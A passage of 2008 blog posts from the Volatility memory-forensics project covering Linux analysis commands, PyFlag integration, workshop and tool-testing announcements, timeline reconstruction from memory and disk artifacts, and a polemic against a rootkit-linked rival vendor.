python volatility linfiles -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5
output

linmodules

The final module which we have included is linmodules. This will print basic information about the currently loaded kernel modules. This allows an investigator to determine if anyone may have attempted to load a kernel module to dynamically change the behavior of the kernel.

python volatility linmodules -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5
output

As you can see, Volatility provides a powerful software architecture that allows it to be easily adapted to whatever type of hardware or operating system the investigator needs to analyze. It also provides extremely useful APIs and libraries that allow investigators to quickly create new modules to support their investigations and to easily share those modules with colleagues. We are also finishing up code that will allow you to run PyKdump scripts transparently within both crash and Volatility. Another advantage of Volatility is that it allows the analyst to perform their investigation on any operating system that supports Python. Thus we believe that Volatility allows us to achieve our goals of leveraging previous work in kernel debugging while being applicable to a broad range of systems. Finally, Volatility is currently integrated into a number of analysis frameworks, including both PTK and PyFlag.

PyFlag Memory Analysis

PyFlag has officially supported memory forensics since its integration of Volatility in January 2008, allowing an investigator to correlate disk images, log files, network traffic, and memory samples all within an intuitive interface. It was also the first framework to support analysis of memory samples stored in either EWF or AFF formats. In this section, we will discuss how, with the upcoming release of Volatility 1.3, this integration has been extended so that PyFlag now has the ability to support the analysis of both Linux and Windows memory samples. This functionality will be briefly demonstrated using the memory sample included in the challenge.

In order to analyze a memory sample with PyFlag, the sample must first be loaded. This is accomplished by choosing the Load IO Data Source menu item found under the Load Data tab at the top of the screen. At the Load IO Data Source page, set "Select IO Subsystem" to Standard and leave the "Evidence Timezone" set to SYSTEM. At the next Load IO Data Source page, once again set "Select IO Subsystem" to Standard and leave the "Evidence Timezone" set to SYSTEM. Depending on whether your image can be found on disk or in the Virtual File System, click either the finger pointing to the folder or the VFS folder, respectively. Having already loaded the evidence file, we will search for the memory sample within the VFS, so we click on the VFS folder. At this point we are presented with a table listing all the files in the VFS. To find the file we are looking for, challenge.mem, we click the funnel in the upper left-hand corner of the window, which allows us to filter the table. At the Filter Table pop-up screen, type "Filename" contains challenge into the Search Query dialog box, then click the Submit button at the bottom. At this point you should see the challenge sample in the table. After choosing the sample, you will be returned to the Load IO Data Source page. Fill in the "Enter partition offset:" box with a zero and the "Unique Data Load ID" box with "mem".
Now click the Submit button in the lower left-hand corner of the window. You will be brought to the "Load Filesystem image" screen. Verify that the "Case" value is set to dfrws and that "Select IO Data Source" matches the value you entered for "Unique Data Load ID" on the previous screen. Then set the "Enter Filesystem type" drop-down to "Linux Memory" and choose a mount point (e.g., memmnt) for the "VFS Mount Point" entry box.
Next, click the Submit button at the lower left-hand corner of the screen. At this point you will be prompted to choose a Volatility profile. Select the 2_6_18-8_1_15_el5 "Profile" from the drop-down menu and click the Submit button again. Next, you will be presented with another drop-down menu to select a "Symbol Map". Select System.map-2.6.18-8.1.15.el5.map from the drop-down.
Once the System Map is selected, click the Submit button in the lower left-hand corner again. At this point PyFlag will begin to load the sample into the system. When it is finished loading, you will be returned to the "Browsing Virtual Filesystem" window and your sample will be mounted at the specified "VFS Mount Point", which in our example is memmnt. Now that the memory sample has been loaded, you can access the data either through a browseable /proc-style interface or through the "Memory Forensics" menu item at the top of the page, as seen in the following image.

Clicking on a linked address will automatically perform the address translation and take you to the correct offset within the physical address space. As previously mentioned, we can also run PyFlag's award-winning collection of carvers against the loaded sample.

Friday, July 4, 2008

Independence Day: The Emancipation of Volatile

Today is truly a day to celebrate independence! As of today, Volatile Systems LLC is free of any contractual agreements that had the ability to limit our business opportunities and technology advancement. Our year-long sabbatical has officially ended. As a result, we can now fully integrate the research we have done over the past five years in the areas of memory forensics and rootkit detection (i.e., FATKit: Memory Forensics, Malware Analysis: DLL Injection Detection, Semantic Integrity, Enterprise Rootkit Detection). This includes all technology which we may have previously licensed to third parties. While others were creating and selling the rootkits responsible for millions of dollars in damages to government and commercial organizations, our team was focused on performing the research necessary to address these threats using memory analysis. Get ready for the real next generation of memory forensics and always remember that "Integrity Matters"!

Sunday, June 15, 2008

Memory Forensics Tool Testing

Volatile Systems LLC is pleased to announce the Memory Forensics Tool Testing initiative. With the growing number of memory acquisition tools that have recently been made available, Volatile Systems has begun establishing a team of industry experts to objectively evaluate these tools. As with other computer forensic tool testing efforts (CFTT), the goal of this project is to develop an open methodology and metrics for testing memory acquisition tools. The hope is to help drive improvement in memory forensics tools and to help users make informed decisions.

Over the last five years, the Volatile Systems team has built numerous hardware and software acquisition methods and, as a result, has the unique combination of institutional knowledge and technical capabilities necessary to effectively lead this effort. We have also chosen a respected team of industry experts to help ensure the validity and objectivity of our testing methodology. As the leading provider of memory forensic analysis services, we are committed to helping our customers and the community at large find the best solutions to suit their memory acquisition needs. If you would like to take part in this project or feel you have insight that could be valuable, please feel free to contact us. We also extend this invitation to vendors who want to make sure that we are evaluating their latest offerings. The MFTT initiative will be a major topic on the OMFW agenda!

Friday, May 30, 2008

Open Memory Forensics Workshop (OMFW)

Volatile memory forensics (i.e., RAM forensics) is becoming an extremely important topic for the future of digital investigations. It has the potential to dramatically transform the way we currently perform digital investigations and to help address many of the challenges currently facing the digital forensics community.

We are pleased to announce the first ever workshop focused on open source volatile memory analysis. This workshop will bring together digital investigation researchers and practitioners to discuss the latest advancements in volatile memory analysis. You will also learn how memory analysis is currently being used to augment digital investigations. Through a series of invited talks and panel discussions you will have the opportunity to engage this exciting community.

This half-day workshop will be co-located with Digital Forensics Research Workshop (DFRWS) 2008 in Baltimore, Maryland, USA, on August 10, 2008. Pre-registration is required and space is limited, so register early. Please note that it will not be possible to register at the door. Reserve your seat by contacting: AAron Walters (awalters [at] 4tphi [dot] net). We are also still seeking individuals with interesting insights who would like to participate as a speaker or panelist.

Join with industry leaders to discuss the latest advancements in memory forensics and the importance of open source initiatives. This is your opportunity to help shape the future of memory forensics!

Invited speakers and panelists include:
  • Dr. Brian Carrier (Basis Technology)

  • Eoghan Casey (Stroz Friedberg, LLC)

  • Dr. Michael Cohen (Australian Federal Police)

  • Brian Dykstra (Jones Dykstra & Associates)

  • Brendan Dolan-Gavitt (Georgia Institute of Technology)

  • Matthew Geiger (CERT)

  • Keith Jones (Jones Dykstra & Associates)

  • Jesse Kornblum (ManTech)

  • Andreas Schuster (Deutsche Telekom AG)

  • AAron Walters (Volatile Systems, LLC)

  • More to be announced......

Brought to you by the Volatility Team: Open Source Memory Forensics.

Saturday, March 15, 2008

Using Hashing to Improve Volatile Memory Forensic Analysis


I wanted to take this opportunity to thank everyone who attended our presentation, "Using Hashing to Improve Volatile Memory Forensic Analysis", at the American Academy of Forensic Sciences 60th Annual Meeting on February 21, 2008, in Washington, D.C. This was joint work with my colleague Blake Matheny and Doug White from the National Institute of Standards and Technology (NIST). The American Academy of Forensic Sciences does a lot of great work furthering the application of science and law. I'm glad to see their renewed interest in the area of digital forensic sciences. In particular, I was encouraged that our peers in the forensic sciences community were able to recognize the importance of volatile memory analysis to the future of digital investigations. I believe this is an extremely important step!

I also wanted to take this opportunity to thank our friends at NIST, especially Doug White and John Tebbutt, for all their help with this research. With their help, we are creating a standard reference data set to support the needs of the growing community of volatile memory analysts. A special thanks also goes to Jide for all his help and thoughtful discussions!

The slides from the AAFS presentation are now available.

Saturday, February 2, 2008

It's about time...

As we mentioned in a previous blog post and in our presentations, we have recently been focusing our attention on the Reconstruction Phase of the digital investigation process. During the Reconstruction Phase, a digital investigator will attempt to organize the analysis results to help develop a theory about what happened during an incident. One method investigators have traditionally used to organize file system analysis is to elucidate the temporal relationships between digital artifacts. This technique is referred to as temporal reconstruction.

Dan Farmer demonstrated the usefulness of temporal reconstruction of filesystem events with the 'mactime' program. In fact, he called mactime "the most potentially valuable forensic tool in your digital detective toolkit" (Farmer, 2000). Rob Lee eventually extended this work with the 'mac_daddy' program, and these tools were finally combined by Brian Carrier into the SleuthKit's versions of 'mactime' and 'mac-robber'. Recently, Florian Buchholz has done a lot of interesting research exploring the characteristics of these temporal relationships and demonstrating, with Zeitline, the value of being able to combine disparate data sources.

In this blog entry, we will demonstrate how digital artifacts extracted from volatile memory analysis can be combined with artifacts from file system analysis to help reconstruct a more complete understanding of the digital crime scene. In fact, volatile memory analysis often provides the context necessary to link seemingly disparate events and their related artifacts, in ways that are not possible with typical live response tools. Using these temporal relationships, we have also been able to develop "temporal incident patterns" allowing us to quickly discern tools and techniques that may have been involved in an incident based on their "temporal footprints". We have also found that the ability to visualize these temporal relationships is invaluable for both presentation and knowledge discovery.

The following images will help demonstrate how a digital investigator can use both volatile memory analysis and visualization to improve temporal reconstructions of the digital crime scene. The file system events used to populate the time line in the images were generated using the Sleuthkit's 'mactime' program. These instantaneous events are represented in the image with blue dots and relate to the time attributes (LastWriteTime, LastAccessTime, CreationTime, etc.) associated with files and directories in a file system (MACtimes). The following image is a visual time line representation of a filtered set of file system events.



In the next image, we augment the time line with events extracted using live response techniques, one type of runtime state analysis. Live response allows us to extract events about objects that were active on the system when acquisition was performed. This could be extracted with your typical live response toolkit (RAPIER, WFT, etc.). The red dots in this image denote when a process was created. Unlike the file system events, this is a duration event, since it has both a start time and an end time. In this image, the end time relates to when the live response was performed, represented by the gray dot. The green dot, another instantaneous event, represents when a process binds a specific port address to its socket. This augmented time line can be seen in the following image.






The final image demonstrates how using volatile memory (RAM) analysis to perform runtime state analysis can further augment our temporal reconstruction of the digital crime scene. In this case, the temporal events were extracted from volatile memory using Volatility. In contrast to the previous image, we are not only able to augment the time line with those objects that were active when live response was performed but also with objects that may have been relinquished by the operating system. The blue dots in the image once again represent file system events. The red dots represent process creation events, except this time a process duration event ends with memory acquisition or when a process exited. The green dots relate to binding sockets and the gray dot relates to when memory acquisition was performed. The final augmented time line can be seen in the following image.
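
To make the fusion concrete, here is a hedged Python sketch of merging the two event sources into a single time line. The tuple layouts are assumptions for illustration: file system rows come from mactime-style output, and process rows from memory analysis.

def merged_timeline(fs_events, proc_events, acquired_at):
    # fs_events:   [(timestamp, "MAC flags", path)] - instantaneous events
    # proc_events: [(create_time, exit_time_or_None, pid, name)] - durations
    events = [(ts, "file", "%s %s" % (flags, path))
              for ts, flags, path in fs_events]
    for start, end, pid, name in proc_events:
        events.append((start, "proc start", "%s (pid %d)" % (name, pid)))
        # A duration event ends when the process exited, or is capped at
        # memory acquisition if it was still running.
        events.append((end or acquired_at, "proc end",
                       "%s (pid %d)" % (name, pid)))
    events.append((acquired_at, "acquisition", "memory sample taken"))
    return sorted(events)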





The purpose of this blog entry was to demonstrate the usefulness of being able to augment temporal reconstruction with both visualization and volatile memory analysis. In the final image, we can easily see how including volatile memory analysis and visualization allows us to exploit temporal locality and volatile context to develop theories about the incident. We have found this to be invaluable during the reconstruction phase of the digital investigation process.


Despite the usefulness of these techniques, it is important to keep in mind that timestamps can be manipulated by a determined adversary, and tools, such as timestomp, have recently been created to frustrate temporal reconstructions of filesystems. Recent research has also discussed important considerations for the digital investigator working with temporal data. Temporal reconstruction is not a panacea; a digital investigator should combine many types of analysis techniques during a digital investigation.

More details to follow ...

Thursday, January 31, 2008

Commercial Support for Volatility!

While at DoD Cyber Crime last week, numerous members of the Volatility community made me aware of a company attempting to spread misinformation about Volatility. It was broadly suggested that there was no support being offered for Volatility. The goal behind the open development of Volatility was to bring together systems researchers who believed in bettering the state of the digital forensics community. One way that we have been able to continue this open development is by offering customizations and support.

Volatile Systems, LLC has been providing commercial support and maintenance for Volatility (and our other products) for the past 8 months. In fact, one of the main reasons Volatile Systems, LLC formed was to support the forensics needs of our users who required commercial support contracts. The added benefit of our commercial support contracts is that you are not only getting guaranteed support and access to our team of unparalleled memory analysts, but you are also actively contributing back to the volatile memory analysis community by allowing us to continue the open development of Volatility.

At this point, we also decided to extend a new offer to those who may be considering spending the thousands of dollars to purchase one of those other commercial products, as they become available. If you are considering investing in one of those products because you think it provides extraction functionality not currently supported in Volatility, contact us and let us know! In most cases, we would be more than willing to use those funds to build you custom modules providing the same capabilities you desire but tailored to your exact needs. In addition, we would provide you access to the source code, training on how to use the modules, and share information on how they were developed. As we have learned from our experience performing volatile memory analysis, the most valuable thing is often not the tool but the experience and training of the analyst. Knowledge is power!

On a tangential note, it was encouraging to get all the positive feedback about Volatility at the conference. We are committed to this growing open community of volatile memory analysts and we are highly appreciative of their support. I also wanted to extend a special thanks to the Volatility community for keeping me updated on this evolving issue. Little do they know, the Order of Volatility is everywhere!

Sunday, January 20, 2008

They are playing you for a fool!

I have talked about this issue before, but based on a number of conversations I had last week at Cyber Crime, I felt it was worth bringing up again. Every time this issue comes up, it reminds me of one of my favorite blog posts, which talks about the ethical conflict in the rootkit community. I also recently came across this blog post from my former advisor, Spaf, which I found relevant as well.

One of the main reasons I dedicated myself to researching volatile memory analysis was the fact that offensive communities and projects were flourishing. As a result, the sophistication of methods and the accessibility of knowledge continued to grow unabated in the offensive community. At the time, I felt we drastically needed a similar revolution in the defensive community: a way of bringing together strong systems researchers who were interested in securing our infrastructure.

Based on the research we were doing at the time, I knew that volatile memory analysis would be an important component of securing those systems and had the potential to disrupt much of the offensive research being performed. As a result, members of our project have spent a great deal of time over the last couple of years writing research papers, giving talks, educating, and developing an open source architecture, in order to inspire research and increase the communal knowledge of the investigative community. In the process, we have had over 20 different contributors from multiple countries across the world. This includes contributions from numerous law enforcement and forensic agencies. In fact, I have been contacted by many universities that are now, or soon will be, using Volatility in their digital forensic courses.

It seems that the work being done in the live memory analysis community has also been successful at getting the attention of the offensive community (especially the rootkit community). In fact, they have attempted many times over the last couple of years to disrupt the communal aspects of these projects. They began by trying to convince people that volatile memory analysis was ineffective. Their methods changed last year, when they began trying to deceptively patent techniques that members of the volatile memory analysis community had already presented at conferences. Recently, I have learned that they are now trying to use their companies as real-life Trojan horses to undermine and divide the open nature of the volatile memory analysis community. They are now trying to sell the very techniques they had previously argued were ineffective, once again capitalizing on the problem they created.

Let's consider the following analogy:

Sadly, your child has been struggling with drug addiction for a number of years. He was recently busted by the police and mandated by the court to attend drug rehabilitation. Your child's drug dealer was a notorious individual by the name of B.S. Hary. B.S. Hary has never hidden the fact that he sells drugs; in fact, he even wrote a book and teaches classes about advanced drug dealing techniques. He often flaunts his drug dealing in the face of local law enforcement, who are overburdened dealing with the myriad of drug-dealing pupils B.S. has released onto the streets. As a result, B.S. Hary's drugs and drug dealing techniques account for the majority of the drug problem currently faced by your community.

Recently, B.S. became concerned about the popularity of drug rehabilitation in pop culture. On the one hand, he realized that rehabilitation could be bad for business; on the other, he figured there was a lot of money to be made in rehabilitation. He decided that he could not sit idly by and watch his drug business be swept out from under him, so he formulated a plan: he would capitalize on the rehabilitation market while undermining its effectiveness by starting his own rehabilitation company called Addiction Responder. B.S. Hary even had the brazenness to open Addiction Responder right next door to his crack house.


B.S. Hary is hoping to play the community for a fool!

As a parent, would you be willing to send your child to the Addiction Responder clinic? Knowing that Addiction Responder is run by a notorious drug dealer, do you think the court would be willing to trust a report that acknowledges your child's successful completion of its drug rehabilitation program? Knowing that the owner of Addiction Responder has a crack house right next door to the clinic, do you think the court would have faith in the fidelity of Addiction Responder's rehabilitation capabilities? Knowing that B.S. sells manufactured drugs out of the crack house right next door, would you be willing to ingest his magic rehabilitation pills? Knowing that the money you give to Addiction Responder for rehabilitation will be used to further his drug cartel, will you be willing to help fund the problem that is tormenting both your family and your community?

Your child's current drug dealer wants to perform his rehab.
You said, no, no, no!


On that note, it seems utterly absurd to me that anyone would consider buying volatile memory (RAM) forensics tools from an organization that freely admits it has armed, and continues to arm, the enemy with "technology being used to evade forensics and response today." As a taxpayer, I'm not happy to see that the government funding they have received for research and development has contributed to the majority of the rootkits currently found on the Internet. As a person involved in forensic investigations, I would not want to be the one responsible for presenting those tools or their results in court.

Defense Attorney: Is it true that the developers of this "investigation" tool are responsible for the techniques found in the majority of rootkits on the Internet today?
Forensic Examiner: Yes.
Defense Attorney: Is it true that the makers of this tool also sell "undetectable" software agents that allow people to secretly spy on a person's or company's computers (similar to malware or spyware)?
Forensic Examiner: Yes.
Defense Attorney: Do the developers of this software also develop tools to exploit software, cheat at online games, and build rootkits?
Forensic Examiner: Yes.


One of the most important things that I have learned from the forensics and digital investigation communities is that the integrity of, and trust that can be placed in, the collected evidence is often the paramount standard. I have been confronted with many situations where we had to forgo certain types of evidence because it had the potential to compromise the integrity of the investigation and/or case. How would you like to walk into court knowing that the evidence you collected and analyzed will immediately be called into question and, as a result, ruin the case? What happens when the malware you are investigating as part of an incident was written by the same people who wrote your forensic tool? Can you trust that they weren't involved?

The question is, are you willing to listen to B.S. and be played for a fool?

And you wonder why I'm angry.....

Friday, January 4, 2008

PyFlag Using the Volatility Framework!

It was only a matter of time....

In case you missed it during the holidays, the latest version of PyFlag now leverages the Volatility Framework to add volatile memory analysis (RAM forensics) to its outstanding list of capabilities. This makes PyFlag the first and only publicly available tool that allows the digital investigator to correlate disk images, log files, network traffic, and RAM captures, all within an intuitive interface. While the current functionality is still preliminary, just imagine the possibilities!

Since PyFlag loads memory images through its standard IO source interface, it is now also possible to store your memory images using the EWF format commonly used in commercial tools. Once the memory image is uploaded to PyFlag, information can be accessed either through a browseable /proc interface or through the Stats view. Michael Cohen and his team have provided a tutorial and image to get you started.
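
As a side note, if you want to examine an EWF-stored memory image outside of PyFlag, a minimal sketch using pyewf (the Python bindings for libewf) might look like the following. This is an assumption about convenient tooling rather than a description of PyFlag's internal IO source API, and "memory.E01" is a placeholder file name.

# Illustrative sketch only: read raw bytes from an EWF-stored memory
# image using pyewf (libewf's Python bindings). This is independent of
# PyFlag's own IO source layer; "memory.E01" is a placeholder.
import binascii
import pyewf

segments = pyewf.glob("memory.E01")   # gather E01, E02, ... segment files
handle = pyewf.handle()
handle.open(segments)

print("media size: %d bytes" % handle.get_media_size())

handle.seek(0)                         # start of the physical memory image
page = handle.read(4096)               # read the first page
print(binascii.hexlify(page[:16]))     # peek at the first 16 bytes

handle.close()

Because EWF segments an image and checksums each chunk, reading through a library like libewf hands you the reassembled raw bytes, which is exactly the abstraction an IO source layer provides to the analysis code above it.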

As I mentioned in a previous post, a special thanks to Europol for bringing our teams together through the High Tech Crime Expert Meeting. I also want to thank Michael Cohen for the great work he has done with PyFlag and his contributions to Volatility! Stay tuned for further exciting collaborations and future Volatility releases in 2008!